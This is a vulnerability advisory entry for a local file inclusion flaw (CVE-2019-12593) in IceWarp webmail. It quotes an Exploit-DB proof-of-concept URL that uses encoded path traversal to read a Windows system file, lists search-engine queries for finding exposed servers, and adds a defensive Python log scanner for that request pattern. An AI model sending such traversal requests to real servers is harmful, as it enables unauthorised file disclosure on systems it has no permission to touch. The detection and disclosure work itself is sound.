vendor: IceWarp
by: JameelNabbo
CVSS: 7.5 HIGH
Local File Inclusion
CWE: 22
Product Name: IceWarp
Affected Version From: 10.4.2004
Affected Version To: 10.4.2004
Patch Exists: NO
Related CWE: CVE-2019-12593
CPE: a:icewarp:icewarp:10.4.4
Metasploit:
Other Scripts:
Tags: packetstorm,cve,cve2019,lfi,icewarp
CVSS Metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
Nuclei Metadata: {'max-request': 2, 'google-query': 'Powered By IceWarp 10.4.4', 'shodan-query': 'title:"icewarp"', 'vendor': 'icewarp', 'product': 'mail_server'}
Platforms Tested: Windows 10
2019

IceWarp <=10.4.4 local file include

IceWarp version 10.4.4 is vulnerable to local file inclusion through the style parameter of /webmail/calendar/minimizer/index.php. An attacker can exploit this vulnerability by including local files and executing arbitrary code. The vulnerability has been assigned CVE-2019-12593.

Mitigation:

Upgrade to a patched version of IceWarp (version > 10.4.4).

Exploit-DB raw data:

# Exploit Title: IceWarp <=10.4.4 local file include
# Date: 02/06/2019
# Exploit Author: JameelNabbo
# Website: uitsec.com
# Vendor Homepage: http://www.icewarp.com
# Software Link: https://www.icewarp.com/downloads/trial/
# Version: 10.4.4
# Tested on: Windows 10
# CVE: CVE-2019-12593
POC:

http://example.com/webmail/calendar/minimizer/index.php?style=[LFI]

Example:
http://example.com/webmail/calendar/minimizer/index.php?style=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
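
A detection check for the request shape shown in the PoC above, as an added example that is not part of the original advisory or exploit entry: it scans web access-log lines for requests to the minimizer script whose style parameter decodes to a path-traversal value. The log lines, the benign value calendar.css and all function names are constructed for illustration.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

TARGET_PATH = "/webmail/calendar/minimizer/index.php"  # script named in the PoC
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample access-log lines (Combined Log Format); not real traffic.
SAMPLE_LOG = [
    '203.0.113.7 - - [02/Jun/2019:10:00:01 +0000] "GET /webmail/calendar/minimizer/'
    'index.php?style=..%5c..%5c..%5cwindows%5cwin.ini HTTP/1.1" 200 92',
    '198.51.100.4 - - [02/Jun/2019:10:00:05 +0000] "GET /webmail/calendar/minimizer/'
    'index.php?style=calendar.css HTTP/1.1" 200 5120',
    '198.51.100.4 - - [02/Jun/2019:10:00:12 +0000] "GET /webmail/index.php HTTP/1.1" 404 0',
]


def decode_fully(value, max_rounds=3):
    """Percent-decode until stable, so nested encodings are normalised too."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def is_suspicious_style(value):
    """True if the value has a '..' path segment or is an absolute/drive path."""
    path = decode_fully(value).replace("\\", "/")
    return (".." in path.split("/") or path.startswith("/")
            or re.match(r"[A-Za-z]:", path) is not None)


def scan(log_lines):
    """Return (line_number, decoded_style) for flagged requests to TARGET_PATH."""
    hits = []
    for number, line in enumerate(log_lines, 1):
        match = REQUEST_RE.search(line)
        url = urlsplit(match.group(1)) if match else None
        if url is None or unquote(url.path).lower() != TARGET_PATH:
            continue
        for value in parse_qs(url.query, keep_blank_values=True).get("style", []):
            if is_suspicious_style(value):
                hits.append((number, decode_fully(value)))
    return hits


if __name__ == "__main__":
    print(scan(SAMPLE_LOG))
```

The path comparison is lower-cased because the tested platform is Windows, where file paths are case-insensitive.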